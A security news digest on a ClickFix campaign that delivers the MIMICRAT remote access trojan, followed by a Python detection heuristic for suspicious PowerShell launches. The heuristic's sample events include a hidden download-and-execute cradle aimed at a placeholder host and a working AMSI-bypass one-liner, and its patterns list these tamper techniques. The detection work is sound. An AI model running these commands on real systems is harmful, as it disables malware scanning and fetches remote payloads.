• ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware
• Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).
• “The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic,” Elastic Security Labs said in a Friday report.
• According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities.
• The campaign was discovered earlier this month.
• It’s also assessed to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT.
• The end goal of the attack is suspected to be ransomware deployment or data exfiltration.
Article Summaries:
- Cybersecurity researchers uncovered a sophisticated ClickFix campaign that uses compromised legitimate websites to deliver a previously unknown remote-access trojan, MIMICRAT (also known as AstarionRAT). The attack chain begins with malicious JavaScript injected into the BIN validation service bincheck.io, which serves a fake Cloudflare verification page and prompts users to run a PowerShell command. That command downloads a second-stage script that disables Windows event tracing (ETW) and the antimalware scan interface (AMSI) before dropping a Lua-based loader that injects MIMICRAT into memory. The RAT communicates over HTTPS on port 443 with traffic shaped to look like web analytics, supports Windows token impersonation and SOCKS5 tunneling, and offers 22 post-exploitation commands. The campaign targets multiple industries and languages, with victims reported in the U.S. and China, and is believed to aim at ransomware deployment or data exfiltration.
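The summary above describes the first two stages of the chain: a user pasting a PowerShell command from a fake verification page, and a second-stage script that tampers with ETW and AMSI before loading the implant. The following is an added detection example written for this page, not code from the article or from Elastic Security Labs. It scores Sysmon-style process-creation events with generic PowerShell tradecraft indicators (download cradles, hidden windows, encoded commands, AMSI/ETW tampering) plus a bonus when the launching parent is explorer.exe or cmd.exe, which is where a user-pasted ClickFix command normally starts. The field names, the weights, the threshold and every log line are constructed assumptions for illustration; the indicator patterns are well-known public PowerShell techniques and are not indicators taken from this campaign.

```python
"""Heuristic triage of process-creation events for ClickFix-style PowerShell
launches. Added example, not from the article or Elastic's report. Weights,
threshold, field names and all sample events below are constructed."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Sysmon Event ID 1 reduced to the fields the heuristic needs (assumed schema)."""
    parent_image: str
    image: str
    command_line: str


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parents from which a user-pasted command is usually launched: the Win+R box
# is hosted by explorer.exe, a pasted console command runs under cmd.exe.
USER_LAUNCH_PARENTS = {"explorer.exe", "cmd.exe"}

# (regex over the lower-cased command line, weight, label). Generic PowerShell
# tradecraft, not campaign-specific indicators.
INDICATORS = [
    (r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|net\.webclient)\b", 3, "download cradle"),
    (r"\b(iex|invoke-expression)\b", 3, "in-memory execution"),
    (r"-(w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 2, "encoded command"),
    (r"-(ep|exec|executionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"amsiutils|amsiinitfailed|amsiscanbuffer", 4, "AMSI tamper"),
    (r"etweventwrite|\[system\.diagnostics\.eventing\.eventprovider\]", 4, "ETW tamper"),
]
ALERT_THRESHOLD = 4  # assumed; tune against your own baseline


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator labels) for one event; 0 for non-PowerShell images."""
    if _basename(ev.image) not in POWERSHELL_IMAGES:
        return 0, []
    cl = ev.command_line.lower()
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cl):
            score += weight
            reasons.append(label)
    parent = _basename(ev.parent_image)
    # A plain interactive console from explorer.exe is normal; only add the
    # parent bonus when some other indicator already fired.
    if score and parent in USER_LAUNCH_PARENTS:
        score += 2
        reasons.append(f"launched from {parent}")
    return score, reasons


def triage(events: list[ProcEvent]) -> list[tuple[int, int, list[str]]]:
    """Return (event index, score, reasons) for every event at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            hits.append((i, score, reasons))
    return hits


# Constructed sample events (no real hosts; the URL uses the reserved .invalid TLD).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode("Write-Output constructed".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/stage2 -UseBasicParsing)"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, f"powershell.exe -w hidden -enc {ENC}"),
    ProcEvent(r"C:\Windows\System32\services.exe", PS,
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"),
    ProcEvent(PS, PS,
              "powershell.exe -nop -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
              ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\""),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe"),
]


if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: {', '.join(reasons)}")
```

Events 0, 1 and 3 are flagged (the pasted download cradle, a hidden encoded launch from the Run box, and the second-stage AMSI tamper spawned by PowerShell itself), while the scheduled administrative script and the plain interactive console stay below the threshold. The parent bonus is deliberately conditional so that a user simply opening a shell does not alert on its own.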
Sources:
- https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html (Latest source article published: 2026-02-20 11:55 UTC)